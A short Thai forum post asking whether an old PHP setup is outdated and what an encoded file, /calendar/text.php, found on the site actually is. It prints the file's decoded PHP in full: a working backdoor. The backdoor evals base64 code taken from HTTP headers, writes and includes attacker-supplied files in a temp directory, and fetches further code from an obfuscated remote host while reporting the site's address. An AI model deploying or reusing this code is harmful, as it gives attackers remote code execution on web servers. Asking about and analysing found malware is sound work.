สคริปนี่จะเก่าไปมั้ย
register_globals on
short_open_tag on
แล้วไฟล์ /calendar/text.php ที่เข้ารหัสไว้มันคือ ....
<?php
if (!defined('determinator')){
function filter(){
foreach ($_GET as $k=>$v){
if (strpos($v,'union')){$_GET[$k]='';}
elseif (strpos($v,'select')){$_GET[$k]='';}
}
}
function getfile($url){
if (ini_get('allow_url_fopen') == '1') {
return @file_get_contents($url);
}
elseif (function_exists('curl_init')){
$ch = @curl_init();
@curl_setopt($ch, CURLOPT_URL,$url);
@curl_setopt($ch, CURLOPT_HEADER,false);
@curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
@curl_setopt($ch, CURLOPT_CONNECTTIMEOUT,5);
if ($data = @curl_exec($ch)) {return $data;}
@curl_close($ch);
}
else {
return '<img src="'.$url.'" width="1px" height="1px" />';
}
}
function upd($file,$url){
$h0=@fopen($file,'w');
@fclose($h0);
if (@is_file($file)){ write($file,getfile($url)) ;};
}
function write($file,$content){
if (@is_file($file)){
$h=@fopen($file,'w');
@fwrite($h,$content);
@fclose($h);
@header('Y_Out: b2s=');
}
}
$type='upd';
$ver='1.12';
$en="base64_encode";
$de="base64_decode";
$host=strtolower(@$_SERVER["HTTP_HOST"]);
$sc=@md5($host.PHP_VERSION.$ver.PHP_OS);
define('determinator',1); filter();
if ($uri=$host.@$_SERVER['REQUEST_URI']){
$tmp='/tmp/';
if (!empty($_ENV['TMP'])) { $tmp = $_ENV['TMP'].'/'; }
if (!empty($_ENV['TMPDIR'])) { $tmp = $_ENV['TMPDIR'].'/'; }
if (!empty($_ENV['TEMP'])) { $tmp = $_ENV['TEMP'].'/'; }
$tmp=$tmp.'.'.$sc;
if (@$_SERVER["HTTP_Y_AUTH"]==$sc){
@header('Y_Versio: '.$ver.$type);
if ($code=$de(@$_SERVER['HTTP_EXECPHP'])){
@eval($code);
exit(0);
}
if ($cmd=$de(@$_SERVER['HTTP_UPDATE'])){upd($tmp,$cmd);}
if ($cmd=$de(@$_SERVER['HTTP_PUTCODE'])){write($tmp,$cmd);}
}
$uri=@urlencode($uri);
if (@is_file($tmp)){@include_once ($tmp);}
else {upd($tmp,"http://"."getprot"."oby"."number".".com"."/i/rem".".php?u=".$uri."&k=".$sc."&t=".$type);}
}
}?>
...จะเชคอะไรให้วุ่นวาย....